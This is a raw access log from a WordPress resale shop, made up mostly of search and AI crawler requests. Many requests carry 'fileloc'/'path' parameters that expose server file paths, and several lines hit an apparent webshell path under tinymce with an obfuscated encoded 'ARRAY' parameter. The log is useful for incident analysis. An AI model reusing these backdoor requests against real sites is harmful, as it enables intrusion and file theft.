172.68.27.161 - - [06/Dec/2025:05:09:48 +0100] "GET /?f=2248666325 HTTP/1.0" 200 217812 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.223.92 - - [06/Dec/2025:05:09:53 +0100] "GET /product-category/iphone-8/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-admin/nav-menus.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-admin HTTP/1.0" 200 76472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.71.190.196 - - [06/Dec/2025:05:09:55 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/Requests HTTP/1.0" 200 19568 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.68.27.161 - - [06/Dec/2025:05:09:59 +0100] "GET /?f=1159294101 HTTP/1.0" 200 217603 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.195.46 - - [06/Dec/2025:05:10:00 +0100] "GET /product/iphone-16-pro-max-256gb-physical-dual-sim-brand-new-sealed/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/class-wp-navigation-fallback.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 26523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.70.35.35 - - [06/Dec/2025:05:10:04 +0100] "GET /product/iphone-16-pro-max-256gb-physical-dual-sim-brand-new-sealed/?fileloc=/var/www/vhosts/iphonesused.com/.htaccess&path=/var/www/vhosts/iphonesused.com HTTP/1.0" 200 18104 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.158.79.108 - - [06/Dec/2025:05:10:08 +0100] "GET /product/iphone-16-pro-max-256gb-physical-dual-sim-brand-new-sealed/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/registration-functions.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 16432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.71.144.16 - - [06/Dec/2025:05:08:09 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373638392p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343038392q3865386137323835393531386237316431313335373064353034613962326436222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
108.162.216.216 - - [06/Dec/2025:05:10:11 +0100] "GET /?f=3552465574 HTTP/1.0" 200 209527 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.211.27 - - [06/Dec/2025:05:10:12 +0100] "GET /product/iphone-16-pro-max-256gb-physical-dual-sim-brand-new-sealed/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/http.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 43461 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
104.23.245.113 - - [06/Dec/2025:05:10:15 +0100] "GET /?f=3621262134 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.223.92 - - [06/Dec/2025:05:10:15 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/SimplePie HTTP/1.0" 200 21247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
108.162.238.44 - - [06/Dec/2025:05:10:17 +0100] "GET /?f=2932351917 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.99 - - [06/Dec/2025:05:10:20 +0100] "GET /?f=512028074 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.195.46 - - [06/Dec/2025:05:10:20 +0100] "GET /product/iphone-16-pro-max-256gb-physical-dual-sim-brand-new-sealed/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/revision.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 49389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.68.27.161 - - [06/Dec/2025:05:10:22 +0100] "GET /sitemap-subkey-1618.xml HTTP/1.0" 200 160055 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.245.113 - - [06/Dec/2025:05:10:22 +0100] "GET /?f=548898582 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.99 - - [06/Dec/2025:05:10:22 +0100] "GET /?f=1853659928 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:10:23 +0100] "GET /?f=3727657261 HTTP/1.0" 200 208374 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.195.46 - - [06/Dec/2025:05:10:24 +0100] "GET /product/iphone-16-pro-max-256gb-physical-dual-sim-brand-new-sealed/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/feed-rss2-comments.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 21204 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.71.30.99 - - [06/Dec/2025:05:10:24 +0100] "GET /?f=1350527622 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.42.210 - - [06/Dec/2025:05:10:29 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/date.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 16624 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.71.127.118 - - [06/Dec/2025:05:08:30 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373731302p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343131302q3066316537323333383966363037356239656637336137373836653437363831222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.68.27.161 - - [06/Dec/2025:05:10:30 +0100] "GET /?f=953146670 HTTP/1.0" 200 229649 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.71.184 - - [06/Dec/2025:05:10:30 +0100] "GET /?f=3011646980 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:10:32 +0100] "GET /?f=2948319863 HTTP/1.0" 200 240134 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.213.198 - - [06/Dec/2025:05:10:32 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/class-requests.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 18521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
104.23.211.27 - - [06/Dec/2025:05:10:37 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/rss.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 42205 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.70.38.116 - - [06/Dec/2025:05:10:40 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/class-wp.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 46013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.68.27.161 - - [06/Dec/2025:05:10:44 +0100] "GET /?f=3654241423 HTTP/1.0" 200 223704 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.30.99 - - [06/Dec/2025:05:10:45 +0100] "GET /?o=92946896041730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.209.24 - - [06/Dec/2025:05:10:45 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/class-wp-user-meta-session-tokens.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 19342 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.71.22.116 - - [06/Dec/2025:05:10:47 +0100] "GET /?f=1580048036 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:10:48 +0100] "GET /?f=3480683555 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.213.198 - - [06/Dec/2025:05:10:48 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/default-filters.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 64251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
108.162.238.44 - - [06/Dec/2025:05:10:49 +0100] "GET /?f=1215524856 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.144.16 - - [06/Dec/2025:05:08:51 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373733312p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343133312q3430343962656439643433653935393265623539633937616361373862386462222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.223.92 - - [06/Dec/2025:05:10:52 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/class-wp-user-request.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 18632 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.68.27.161 - - [06/Dec/2025:05:10:55 +0100] "GET /?f=3472546450 HTTP/1.0" 200 216376 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.71.184 - - [06/Dec/2025:05:10:56 +0100] "GET /?f=3648071441 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:10:56 +0100] "GET /?o=64011584021730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.223.92 - - [06/Dec/2025:05:10:57 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/class-wp-block-type-registry.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 21455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
172.71.30.99 - - [06/Dec/2025:05:10:58 +0100] "GET /?f=4294311978 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.175.55 - - [06/Dec/2025:05:11:00 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/class-wp-block-bindings-registry.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes HTTP/1.0" 200 25200 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
104.22.1.32 - - [06/Dec/2025:05:11:02 +0100] "GET /?f=383890531 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.158.79.108 - - [06/Dec/2025:05:11:05 +0100] "GET /product/iphone-13-pro-max-256gb-with-box-accessories/?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-admin/upload.php&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-admin HTTP/1.0" 200 35666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.158.175.148 - - [06/Dec/2025:05:11:07 +0100] "GET /?f=4267129227 HTTP/1.0" 200 207524 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.70.196 - - [06/Dec/2025:05:11:10 +0100] "GET /?f=4132152572 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:11:11 +0100] "GET /?f=3916329696 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.164.92 - - [06/Dec/2025:05:09:12 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373735322p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343135322q6461306136663534386336623934613038356238326231633162363637343333222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.69.71.184 - - [06/Dec/2025:05:11:14 +0100] "GET /?f=1436146880 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:11:18 +0100] "GET /?f=1288813293 HTTP/1.0" 200 229993 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.27.161 - - [06/Dec/2025:05:11:29 +0100] "GET /?f=4019717794 HTTP/1.0" 200 199116 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.30.99 - - [06/Dec/2025:05:11:32 +0100] "GET /?f=2694950190 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.158.95.192 - - [06/Dec/2025:05:09:33 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373737332p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343137332q6162393737646262656262633763656136366432666430633862666131633835222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.30.99 - - [06/Dec/2025:05:11:36 +0100] "GET /?f=3056047939 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:11:36 +0100] "GET /?f=201880036 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:11:41 +0100] "GET /?f=2838314711 HTTP/1.0" 200 219107 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.71.184 - - [06/Dec/2025:05:11:41 +0100] "GET /?o=102286236001730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:11:43 +0100] "GET /?o=60173020101730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.7.47 - - [06/Dec/2025:05:11:48 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fbad_gateway.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17309 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.70.196 - - [06/Dec/2025:05:11:48 +0100] "GET /?f=4230063441 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.32 - - [06/Dec/2025:05:11:49 +0100] "GET /?f=3549673199 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.7.47 - - [06/Dec/2025:05:11:50 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fmethod_not_allowed.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17304 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:11:52 +0100] "GET /?f=134363495 HTTP/1.0" 200 199284 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.7.47 - - [06/Dec/2025:05:11:53 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Finternal_server_error.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17607 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:11:53 +0100] "GET /?f=2959558828 HTTP/1.0" 200 206010 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.246.197 - - [06/Dec/2025:05:09:54 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373739342p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343139342q3266663639336336373661656236656334623565653462633131333830366565222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.23.245.112 - - [06/Dec/2025:05:11:56 +0100] "GET /?f=1043113908 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.7.47 - - [06/Dec/2025:05:11:56 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fproxy_authentication_required.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
108.162.238.44 - - [06/Dec/2025:05:11:59 +0100] "GET /?o=37636780021730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.7.47 - - [06/Dec/2025:05:11:59 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fbad_request.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.131.185 - - [06/Dec/2025:05:12:03 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-styles.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 29699 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
108.162.238.44 - - [06/Dec/2025:05:12:03 +0100] "GET /?f=2961637972 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:12:03 +0100] "GET /?f=2840580989 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.158.175.148 - - [06/Dec/2025:05:12:04 +0100] "GET /?f=2473127885 HTTP/1.0" 200 215205 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.131.185 - - [06/Dec/2025:05:12:05 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-term.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 21972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.131.185 - - [06/Dec/2025:05:12:08 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-simplepie-sanitize-kses.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 18256 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.70.196 - - [06/Dec/2025:05:12:11 +0100] "GET /?f=1863360269 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.131.185 - - [06/Dec/2025:05:12:11 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-feed.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 16809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
108.162.238.44 - - [06/Dec/2025:05:12:12 +0100] "GET /?o=103046826071730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.131.185 - - [06/Dec/2025:05:12:14 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fadmin-bar.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 62201 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
